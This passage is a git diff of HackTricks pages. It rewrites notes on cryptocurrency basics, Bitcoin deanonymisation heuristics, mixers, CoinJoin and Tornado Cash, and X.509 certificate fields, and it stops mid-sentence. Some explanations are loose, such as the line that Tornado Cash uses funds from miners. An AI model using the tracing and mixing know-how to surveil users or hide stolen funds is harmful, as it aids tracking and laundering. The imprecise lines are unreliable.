diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index 73f686d73..988b051e5 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -15,275 +15,179 @@ Other ways to support HackTricks: -# Basic Terminology +## Basic Concepts -* **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediary’s involvement or time loss. (From [here](https://www.ibm.com/topics/smart-contracts)). - * Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** (so the results are stored inmutable) and can be read by the people before accepting them. -* **dApps**: **Decentralised applications** are implemented on top of **smart** **contracts**. They usually have a front-end where the user can interact with the app, the **back-end** is public (so it can be audited) and is implemented as a **smart contract**. Sometimes the use of a database is needed, Ethereum blockchain allocates certain storage to each account. -* **Tokens & coins**: A **coin** is a cryptocurrency that act as **digital** **money** and a **token** is something that **represents** some **value** but it's not a coin. - * **Utility Tokens**: These tokens allow the user to **access certain service later** (it's something that have some value in a specific environment). - * **Security Tokens**: These represents the **ownership** or some asset. -* **DeFi**: **Decentralized Finance**. -* **DEX: Decentralized Exchange Platforms**. -* **DAOs**: **Decentralized Autonomous Organizations**. +- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries. +- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end. +- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts. + - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership. +- **DeFi** stands for Decentralized Finance, offering financial services without central authorities. +- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively. -# Consensus Mechanisms +## Consensus Mechanisms -For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**. +Consensus mechanisms ensure secure and agreed transaction validations on the blockchain: +- **Proof of Work (PoW)** relies on computational power for transaction verification. +- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW. -Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network. +## Bitcoin Essentials -## Proof Of Work (PoW) +### Transactions -This uses a **validation of computational prowess** to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.\ -The **miners** will **select several transactions** and then start **computing the Proof Of Work**. The **miner with the greatest computation resources** is more probably to **finish** **earlier** the Proof of Work and get the fees of all the transactions. +Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers. -## Proof Of Stake (PoS) +#### Key Components: -PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack.\ -In this kind of consensus, the more tokens a miner has, the more probably it will be that the miner will be asked to create the next block.\ -Compared with PoW, this greatly **reduced the energy consumption** the miners are expending. +- **Multisignature Transactions** require multiple signatures to authorize a transaction. +- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules). -# Bitcoin +### Lightning Network -## Transactions +Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain. -A simple **transaction** is a **movement of money** from an address to another one.\ -An **address** in bitcoin is the hash of the **public** **key**, therefore, someone in order to make a transaction from an address he needs to know the private key associated to that public key (the address).\ -Then, when a **transaction** is performed, it's **signed** with the private key of the address to show that the transaction is **legit**. +## Bitcoin Privacy Concerns -The first part of producing a digital signature in Bitcoin can be represented mathematically in the following way:\ -_**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_) +Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users. -Where: +## Acquiring Bitcoins Anonymously -* \_d\_A is the signing **private key** -* _m_ is the **transaction** -* Fhash is the hashing function -* Fsig is the signing algorithm -* Sig is the resulting signature +Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy. -The signing function (Fsig) produces a signature (Sig) that comprises of two values: R and S: -* Sig = (R, S) +# Bitcoin Privacy Atacks -Once R and S have been calculated, they are serialized into a byte stream that is encoded using an international standard encoding scheme that is known as the Distinguished Encoding Rules (or DER). In order to verify that the signature is valid, a signature verification algorithm is used. Verification of a digital signature requires the following: +# Summary of Bitcoin Privacy Attacks -* Signature (R and S) -* Transaction hash -* The public key that corresponds to the private key that was used to create the signature +In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy. -Verification of a signature effectively means that only the owner of the private key (that generated the public key) could have produced the signature on the transaction. The signature verification algorithm will return ‘TRUE’ if the signature is indeed valid. +## **Common Input Ownership Assumption** -### Multisignature Transactions +It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**. -A multi-signature **address** is an address that is associated with more than one ECDSA private key. The simplest type is an m-of-n address - it is associated with n private keys, and sending bitcoins from this address requires signatures from at least m keys. A multi-signature **transaction** is one that sends funds from a multi-signature address. +## **UTXO Change Address Detection** -### Transactions Fields +A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy. -Each bitcoin transaction has several fields: +### Example +To mitigate this, mixing services or using multiple addresses can help obscure ownership. -* **Inputs**: The amount and address **from** where **bitcoins** are **being** transferred -* **Outputs**: The address and amounts that each **transferred** to **each** **output** -* **Fee:** The amount of **money** that is **payed** to the **miner** of the transaction -* **Script\_sig**: Script signature of the transaction -* **Script\_type**: Type of transaction +## **Social Networks & Forums Exposure** -There are **2 main types** of transactions: +Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**. -* **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** (from the private key) and **public** **key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash, if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security. -* **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** (this means the person how want this money send a script) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one. +## **Transaction Graph Analysis** -## Lightning Network +Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds. -This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it.\ -This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per second) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain: +## **Unnecessary Input Heuristic (Optimal Change Heuristic)** -![](<../../.gitbook/assets/image (611).png>) +This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender. -Normal use of the Lightning Network consists of **opening a payment channel** by committing a funding transaction to the relevant base blockchain (layer 1), followed by making **any number** of Lightning Network **transactions** that update the tentative distribution of the channel's funds **without broadcasting those to the blockchain**, optionally followed by closing the payment channel by **broadcasting** the **final** **version** of the settlement transaction to distribute the channel's funds. +### Example -Note that any of the both members of the channel can stop and send the final state of the channel to the blockchain at any time. - -# Bitcoin Privacy Attacks - -## Common Input - -Theoretically the inputs of one transaction can belong to different users, but in reality that is unusual as it requires extra steps. Therefore, very often it can be assumed that **2 input addresses in the same transaction belongs to the same owner**. - -## UTXO Change Address Detection - -**UTXO** means **Unspent Transaction Outputs** (UTXOs). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**, **2 different outputs** will appear: the **intended** one and a **random new change address** where the rest of the money will be saved. - -Then, a watcher can make the assumption that **the new change address generated belong to the owner of the UTXO**. - -## Social Networks & Forums - -Some people gives data about theirs bitcoin addresses in different webs on Internet. **This make pretty easy to identify the owner of an address**. - -## Transaction Graphs - -By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. Therefore, it's possible to know something about **users** that are **related** in the blockchain. - -## **Unnecessary input heuristic** - -Also called the "optimal change heuristic". Consider this bitcoin transaction. It has two inputs worth 2 BTC and 3 BTC and two outputs worth 4 BTC and 1 BTC. - -``` +```bash 2 btc --> 4 btc 3 btc 1 btc ``` -Assuming one of the outputs is change and the other output is the payment. There are two interpretations: the payment output is either the 4 BTC output or the 1 BTC output. But if the 1 BTC output is the payment amount then the 3 BTC input is unnecessary, as the wallet could have spent only the 2 BTC input and paid lower miner fees for doing so. This is an indication that the real payment output is 4 BTC and that 1 BTC is the change output. +If adding more inputs makes the change output larger than any single input, it can confuse the heuristic. -This is an issue for transactions which have more than one input. One way to fix this leak is to add more inputs until the change output is higher than any input, for example: +## **Forced Address Reuse** -``` -2 btc --> 4 btc -3 btc 6 btc -5 btc -``` +Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together. -## Forced address reuse +### Correct Wallet Behavior +Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak. -**Forced address reuse** or **incentivized address reuse** is when an adversary pays an (often small) amount of bitcoin to addresses that have already been used on the block chain. The adversary hopes that users or their wallet software **will use the payments as inputs to a larger transaction which will reveal other addresses via the the common-input-ownership** heuristic. These payments can be understood as a way to coerce the address owner into unintentional address reuse. +## **Other Blockchain Analysis Techniques** -This attack is sometimes incorrectly called a **dust attack**. +- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user. +- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change. +- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address. +- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable. -The correct behaviour by wallets is to not spend coins that have landed on an already-used empty addresses. +## **Traffic Analysis** -## Other Blockchain Analysis +By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions. -* **Exact Payment Amounts**: In order to avoid transactions with a change, the payment needs to be equal to the UTXO (which is highly unexpected). Therefore, a **transaction with no change address are probably transfer between 2 addresses of the same user**. -* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that** "round number" **price**, so the other part must be the leftover. -* **Wallet fingerprinting:** A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint. -* **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**. +## More +For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). -## Traffic analysis -Some organisation **sniffing your traffic** can see you communicating in the bitcoin network.\ -If the adversary sees a transaction or block **coming out of your node which did not previously enter**, then it can know with near-certainty that **the transaction was made by you or the block was mined by you**. As internet connections are involved, the adversary will be able to **link the IP address with the discovered bitcoin information**. +# Anonymous Bitcoin Transactions -An attacker that isn't able to sniff all the Internet traffic but that has **a lot of Bitcoin nodes** in order to stay **closer** to the s**o**urces could be able to know the IP address that are announcing transactions or blocks.\ -Also, some wallets periodically rebroadcast their unconfirmed transactions so that they are more likely to propagate widely through the network and be mined. +## Ways to Get Bitcoins Anonymously -## Other attacks to find info about the owner of addresses +- **Cash Transactions**: Acquiring bitcoin through cash. +- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin. +- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining) +- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended. -For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) +## Mixing Services -# Anonymous Bitcoins - -## Obtaining Bitcoins Anonymously - -* **Cash trades:** Buy bitcoin using cash. -* **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online. -* **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled\_mining) generally know the hasher's IP address. -* **Stealing:** In theory another way of obtaining anonymous bitcoin is to steal them. - -## Mixers - -A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions. - -However, the user needs to trust the mixing service to return the bitcoin and also to not be saving logs about the relations between the money received and sent.\ -Some other services can be also used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later. +By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos. ## CoinJoin -**CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**.\ -This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer. +**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced. -Examples of (likely) CoinJoin transactions IDs on bitcoin's blockchain are `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. +Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -[**https://coinjoin.io/en**](https://coinjoin.io/en)\ -**Similar to coinjoin but better and for ethereum you have** [**Tornado Cash**](https://tornado.cash) **(the money is given from miners, so it jus appear in your waller).** +For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners. ## PayJoin -The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value. +A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities. -PayJoin (also called pay-to-end-point or P2EP) is a special type of CoinJoin between two parties where one party pays the other. The transaction then **doesn't have the distinctive multiple outputs** with the same value, and so is not obviously visible as an equal-output CoinJoin. Consider this transaction: - -``` +```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` -It could be interpreted as a simple transaction paying to somewhere with leftover change (ignore for now the question of which output is payment and which is change). Another way to interpret this transaction is that the 2 BTC input is owned by a merchant and 5 BTC is owned by their customer, and that this transaction involves the customer paying 1 BTC to the merchant. There is no way to tell which of these two interpretations is correct. The result is a coinjoin transaction that breaks the common-input-ownership heuristic and improves privacy, but is also **undetectable and indistinguishable from any regular bitcoin transaction**. +Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions. -If PayJoin transactions became even moderately used then it would make the **common-input-ownership heuristic be completely flawed in practice**. As they are undetectable we wouldn't even know whether they are being used today. As transaction surveillance companies mostly depend on that heuristic, as of 2019 there is great excitement about the PayJoin idea. +**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy. -# Bitcoin Privacy Good Practices -## Wallet Synchronization +# Best Practices for Privacy in Cryptocurrencies -Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** (which is maximally private) and **client-side block filtering** (which is very good). +## **Wallet Synchronization Techniques** -* **Full node:** Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in. -* **Client-side block filtering:** Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance. +To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out: -## Tor +- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in. +- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found. -Bitcoin network uses a peer-to-peer network, which means that other peers can learn your IP address. This is why it's recommend to **connect through Tor every time you want to interact with the bitcoin network**. +## **Utilizing Tor for Anonymity** -## Avoiding address reuse +Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network. -**Addresses being used more than once is very damaging to privacy because that links together more blockchain transactions with proof that they were created by the same entity**. The most private and secure way to use bitcoin is to send a brand **new address to each person who pays you**. After the received coins have been spent the address should never be used again. Also, a brand new bitcoin address should be demanded when sending bitcoin. All good bitcoin wallets have a user interface which discourages address reuse. +## **Preventing Address Reuse** -## Multiple transactions +To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design. -**Paying** someone with **more than one on-chain transaction** can greatly reduce the power of amount-based privacy attacks such as amount correlation and round numbers. For example, if the user wants to pay 5 BTC to somebody and they don't want the 5 BTC value to be easily searched for, then they can send two transactions for the value of 2 BTC and 3 BTC which together add up to 5 BTC. +## **Strategies for Transaction Privacy** -## Change avoidance +- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks. +- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods. +- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy. -Change avoidance is where transaction inputs and outputs are carefully chosen to not require a change output at all. **Not having a change output is excellent for privacy**, as it breaks change detection heuristics. +# **Monero: A Beacon of Anonymity** -## Multiple change outputs +Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy. -If change avoidance is not an option then **creating more than one change output can improve privacy**. This also breaks change detection heuristics which usually assume there is only a single change output. As this method uses more block space than usual, change avoidance is preferable. +# **Ethereum: Gas and Transactions** -# Monero +## **Understanding Gas** -When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void. +Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded. -# Ethereum +## **Executing Transactions** -## Gas +Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data. -Gas refers to the unit that measures the **amount** of **computational** **effort** required to execute specific operations on the Ethereum network. Gas refers to the **fee** required to successfully conduct a **transaction** on Ethereum. +These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security. -Gas prices are denoted in **gwei**, which itself is a denomination of ETH - each gwei is equal to **0.000000001 ETH** (10-9 ETH). For example, instead of saying that your gas costs 0.000000001 ether, you can say your gas costs 1 gwei. The word 'gwei' itself means 'giga-wei', and it is equal to **1,000,000,000 wei**. Wei itself is the **smallest unit of ETH**. - -To calculate the gas that a transaction is going to cost read this example: - -Let’s say Jordan has to pay Taylor 1 ETH. In the transaction the gas limit is 21,000 units and the base fee is 100 gwei. Jordan includes a tip of 10 gwei. - -Using the formula above we can calculate this as `21,000 * (100 + 10) = 2,310,000 gwei` or 0.00231 ETH. - -When Jordan sends the money, 1.00231 ETH will be deducted from Jordan's account. Taylor will be credited 1.0000 ETH. Miner receives the tip of 0.00021 ETH. Base fee of 0.0021 ETH is burned. - -Additionally, Jordan can also set a max fee (`maxFeePerGas`) for the transaction. The difference between the max fee and the actual fee is refunded to Jordan, i.e. `refund = max fee - (base fee + priority fee)`. Jordan can set a maximum amount to pay for the transaction to execute and not worry about overpaying "beyond" the base fee when the transaction is executed. - -As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed. - -## Transactions - -Notice that in the **Ethereum** network a transaction is performed between 2 addresses and these can be **user or smart contract addresses**.\ -**Smart Contracts** are stored in the distributed ledger via a **special** **transaction**. - -Transactions, which change the state of the EVM, need to be broadcast to the whole network. Any node can broadcast a request for a transaction to be executed on the EVM; after this happens, a **miner** will **execute** the **transaction** and propagate the resulting state change to the rest of the network.\ -Transactions require a **fee** and must be mined to become valid. - -A submitted transaction includes the following information: - -* `recipient` – the receiving address (if an externally-owned account, the transaction will transfer value. If a contract account, the transaction will execute the contract code) -* `signature` – the identifier of the sender. This is generated when the sender's private key signs the transaction and confirms the sender has authorised this transaction -* `value` – amount of ETH to transfer from sender to recipient (in WEI, a denomination of ETH) -* `data` – optional field to include arbitrary data -* `gasLimit` – the maximum amount of gas units that can be consumed by the transaction. Units of gas represent computational steps -* `maxPriorityFeePerGas` - the maximum amount of gas to be included as a tip to the miner -* `maxFeePerGas` - the maximum amount of gas willing to be paid for the transaction (inclusive of `baseFeePerGas` and `maxPriorityFeePerGas`) - -Note that there isn't any field for the origin address, this is because this can be extrapolated from the signature. ## References diff --git a/cryptography/certificates.md b/cryptography/certificates.md index adbd695d2..ee0644afb 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md @@ -24,180 +24,171 @@ Get Access Today: ## What is a Certificate -In cryptography, a **public key certificate,** also known as a **digital certificate** or **identity certificate,** is an electronic document used to prove the ownership of a public key. The certificate includes information about the key, information about the identity of its owner (called the subject), and the digital signature of an entity that has verified the certificate's contents (called the issuer). If the signature is valid, and the software examining the certificate trusts the issuer, then it can use that key to communicate securely with the certificate's subject. +A **public key certificate** is a digital ID used in cryptography to prove someone owns a public key. It includes the key's details, the owner's identity (the subject), and a digital signature from a trusted authority (the issuer). If the software trusts the issuer and the signature is valid, secure communication with the key's owner is possible. -In a typical [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key\_infrastructure) (PKI) scheme, the certificate issuer is a [certificate authority](https://en.wikipedia.org/wiki/Certificate\_authority) (CA), usually a company that charges customers to issue certificates for them. By contrast, in a [web of trust](https://en.wikipedia.org/wiki/Web\_of\_trust) scheme, individuals sign each other's keys directly, in a format that performs a similar function to a public key certificate. - -The most common format for public key certificates is defined by [X.509](https://en.wikipedia.org/wiki/X.509). Because X.509 is very general, the format is further constrained by profiles defined for certain use cases, such as [Public Key Infrastructure (X.509)](https://en.wikipedia.org/wiki/PKIX) as defined in RFC 5280. +Certificates are mostly issued by [certificate authorities](https://en.wikipedia.org/wiki/Certificate_authority) (CAs) in a [public-key infrastructure](https://en.wikipedia.org/wiki/Public-key_infrastructure) (PKI) setup. Another method is the [web of trust](https://en.wikipedia.org/wiki/Web_of_trust), where users directly verify each other’s keys. The common format for certificates is [X.509](https://en.wikipedia.org/wiki/X.509), which can be adapted for specific needs as outlined in RFC 5280. ## x509 Common Fields -* **Version Number:** Version of x509 format. -* **Serial Number**: Used to uniquely identify the certificate within a CA's systems. In particular this is used to track revocation information. -* **Subject**: The entity a certificate belongs to: a machine, an individual, or an organization. - * **Common Name**: Domains affected by the certificate. Can be 1 or more and can contain wildcards. - * **Country (C)**: Country - * **Distinguished name (DN)**: The whole subject: `C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net` - * **Locality (L)**: Local place - * **Organization (O)**: Organization name - * **Organizational Unit (OU)**: Division of an organisation (like "Human Resources"). - * **State or Province (ST, S or P)**: List of state or province names -* **Issuer**: The entity that verified the information and signed the certificate. - * **Common Name (CN)**: Name of the certificate authority - * **Country (C)**: Country of the certificate authority - * **Distinguished name (DN)**: Distinguished name of the certificate authority - * **Locality (L)**: Local place where the organisation can be found. - * **Organization (O)**: Organisation name - * **Organizational Unit (OU)**: Division of an organisation (like "Human Resources"). -* **Not Before**: The earliest time and date on which the certificate is valid. Usually set to a few hours or days prior to the moment the certificate was issued, to avoid [clock skew](https://en.wikipedia.org/wiki/Clock\_skew#On\_a\_network) problems. -* **Not After**: The time and date past which the certificate is no longer valid. -* **Public Key**: A public key belonging to the certificate subject. (This is one of the main parts as this is what is signed by the CA) - * **Public Key Algorithm**: Algorithm used to generate the public key. Like RSA. - * **Public Key Curve**: The curve used by the elliptic curve public key algorithm (if apply). Like nistp521. - * **Public Key Exponent**: Exponent used to derive the public key (if apply). Like 65537. - * **Public Key Size**: The size of the public key space in bits. Like 2048. - * **Signature Algorithm**: The algorithm used to sign the public key certificate. - * **Signature**: A signature of the certificate body by the issuer's private key. -* **x509v3 extensions** - * **Key Usage**: The valid cryptographic uses of the certificate's public key. Common values include digital signature validation, key encipherment, and certificate signing. - * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `Digital Signature` - * **Extended Key Usage**: The applications in which the certificate may be used. Common values include TLS server authentication, email protection, and code signing. - * In a Web certificate this will appear as a _X509v3 extension_ and will have the value `TLS Web Server Authentication` - * **Subject Alternative Name:** Allows users to specify additional host **names** for a single SSL **certificate**. The use of the SAN extension is standard practice for SSL certificates, and it's on its way to replacing the use of the common **name**. - * **Basic Constraint:** This extension describes whether the certificate is a CA certificate or an end entity certificate. A CA certificate is something that signs certificates of others and a end entity certificate is the certificate used in a web page for example (the last par of the chain). - * **Subject Key Identifier** (SKI): This extension declares a unique **identifier** for the public **key** in the certificate. It is required on all CA certificates. CAs propagate their own SKI to the Issuer **Key Identifier** (AKI) extension on issued certificates. It's the hash of the subject public key. - * **Authority Key Identifier**: It contains a key identifier which is derived from the public key in the issuer certificate. It's the hash of the issuer public key. - * **Authority Information Access** (AIA): This extension contains at most two types of information : - * Information about **how to get the issuer of this certificate** (CA issuer access method) - * Address of the **OCSP responder from where revocation of this certificate** can be checked (OCSP access method). - * **CRL Distribution Points**: This extension identifies the location of the CRL from which the revocation of this certificate can be checked. The application that processes the certificate can get the location of the CRL from this extension, download the CRL and then check the revocation of this certificate. - * **CT Precertificate SCTs**: Logs of Certificate transparency regarding the certificate +### **Common Fields in x509 Certificates** -### Difference between OCSP and CRL Distribution Points +In x509 certificates, several **fields** play critical roles in ensuring the certificate's validity and security. Here's a breakdown of these fields: -**OCSP** (RFC 2560) is a standard protocol that consists of an **OCSP client and an OCSP responder**. This protocol **determines revocation status of a given digital public-key certificate** **without** having to **download** the **entire CRL**.\ -**CRL** is the **traditional method** of checking certificate validity. A **CRL provides a list of certificate serial numbers** that have been revoked or are no longer valid. CRLs let the verifier check the revocation status of the presented certificate while verifying it. CRLs are limited to 512 entries.\ -From [here](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm). +- **Version Number** signifies the x509 format's version. +- **Serial Number** uniquely identifies the certificate within a Certificate Authority's (CA) system, mainly for revocation tracking. +- The **Subject** field represents the certificate's owner, which could be a machine, an individual, or an organization. It includes detailed identification such as: + - **Common Name (CN)**: Domains covered by the certificate. + - **Country (C)**, **Locality (L)**, **State or Province (ST, S, or P)**, **Organization (O)**, and **Organizational Unit (OU)** provide geographical and organizational details. + - **Distinguished Name (DN)** encapsulates the full subject identification. +- **Issuer** details who verified and signed the certificate, including similar subfields as the Subject for the CA. +- **Validity Period** is marked by **Not Before** and **Not After** timestamps, ensuring the certificate is not used before or after a certain date. +- The **Public Key** section, crucial for the certificate's security, specifies the algorithm, size, and other technical details of the public key. +- **x509v3 extensions** enhance the certificate's functionality, specifying **Key Usage**, **Extended Key Usage**, **Subject Alternative Name**, and other properties to fine-tune the certificate's application. -### What is Certificate Transparency +#### **Key Usage and Extensions** -Certificate Transparency aims to remedy certificate-based threats by **making the issuance and existence of SSL certificates open to scrutiny by domain owners, CAs, and domain users**. Specifically, Certificate Transparency has three main goals: +- **Key Usage** identifies cryptographic applications of the public key, like digital signature or key encipherment. +- **Extended Key Usage** further narrows down the certificate's use cases, e.g., for TLS server authentication. +- **Subject Alternative Name** and **Basic Constraint** define additional host names covered by the certificate and whether it's a CA or end-entity certificate, respectively. +- Identifiers like **Subject Key Identifier** and **Authority Key Identifier** ensure uniqueness and traceability of keys. +- **Authority Information Access** and **CRL Distribution Points** provide paths to verify the issuing CA and check certificate revocation status. +- **CT Precertificate SCTs** offer transparency logs, crucial for public trust in the certificate. -* Make it impossible (or at least very difficult) for a CA to **issue a SSL certificate for a domain without the certificate being visible to the owner** of that domain. -* Provide an **open auditing and monitoring system that lets any domain owner or CA determine whether certificates have been mistakenly or 